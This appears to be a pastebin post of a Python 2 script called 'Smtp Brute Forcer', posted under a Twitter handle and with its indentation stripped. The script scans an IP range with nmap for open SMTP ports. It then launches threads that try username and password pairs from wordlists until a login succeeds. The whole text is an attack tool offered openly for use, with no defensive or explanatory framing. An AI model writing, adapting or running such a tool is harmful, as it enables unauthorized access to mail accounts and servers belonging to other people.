Smtp Brute Forcer

1. #!usr/bin/python
2. #Smtp Brute Forcer, searches ip_range for hosts using smtp.
3.  
4.  
5.  
6. import threading, time, StringIO, commands, random, sys, smtplib, re, socket
7. from smtplib import SMTP
8. from copy import copy
9.  
10. if len(sys.argv) !=4:
11. print "Usage: ./smtpbrute_iprange.py <ip_range> <userlist> <wordlist>"
12. sys.exit(1)
13.  
14. try:
15. users = open(sys.argv[2], "r").readlines()
16. except(IOError):
17. print "Error: Check your userlist path\n"
18. sys.exit(1)
19.  
20. try:
21. words = open(sys.argv[3], "r").readlines()
22. except(IOError):
23. print "Error: Check your wordlist path\n"
24. sys.exit(1)
25.  
26. print "\n\t smtpBruteForcer "
27. print "\t--------------------------------------------------\n"
28. print "[+] Scanning:",sys.argv[1]
29. print "[+] Users Loaded:",len(users)
30. print "[+] Words Loaded:",len(words)
31.  
32. wordlist = copy(words)
33.  
34. def scan():
35.  
36. iprange = sys.argv[1]
37. ip_list = []
38.  
39. nmap = StringIO.StringIO(commands.getstatusoutput('nmap -P0 '+iprange+' -p 25 | grep open -B 3')[1]).readlines()
40.  
41. for tmp in nmap:
42. ipaddr = re.findall("\d*\.\d*\.\d*\.\d*", tmp)
43. if ipaddr:
44. ip_list.append(ipaddr[0])
45. return ip_list
46.  
47. def reloader():
48. for word in wordlist:
49. words.append(word)
50.  
51. def getword():
52. lock = threading.Lock()
53. lock.acquire()
54. if len(words) != 0:
55. value = random.sample(words, 1)
56. words.remove(value[0])
57.  
58. else:
59. reloader()
60. value = random.sample(words, 1)
61.  
62. lock.release()
63. return value[0][:-1]
64.  
65. class Workhorse(threading.Thread):
66.  
67. def run(self):
68. value = getword()
69. try:
70. print "-"*12
71. print "User:",user[:-1],"Password:",value
72. smtp = smtplib.SMTP(ip)
73. smtp.login(user[:-1], value)
74. print "\t\nLogin successful:",user, value
75. smtp.quit()
76. work.join()
77. sys.exit(2)
78. except(socket.gaierror, socket.error, socket.herror, smtplib.SMTPException), msg:
79. #print "An error occurred:", msg
80. pass
81.  
82. ip_list = scan()
83. print "[+] Hosts Loaded:",len(ip_list),"\n"
84. for ip in ip_list:
85. print "\n\tAttempting BruteForce:",ip,"\n"
86. try:
87. helo = smtplib.SMTP(ip)
88. print helo.helo(), "\n"
89. helo.quit()
90. except(socket.gaierror, socket.error, socket.herror, smtplib.SMTPException):
91. print "Server doesn't support the Helo cmd"
92. for user in users:
93. for i in range(len(words)):
94. if i == 0: reloader()
95. work = Workhorse()
96. work.start()
97. time.sleep(2)
98.  
99. @anonandmore - twitter ....
100.  
101. I do not take credit for creating this ... A friend did we had a project coming up but the dude disappeared I hope to see him again one day I know for one He wouldnt want this to go to complete waste so I decided to make them open source on pastebin love yall <3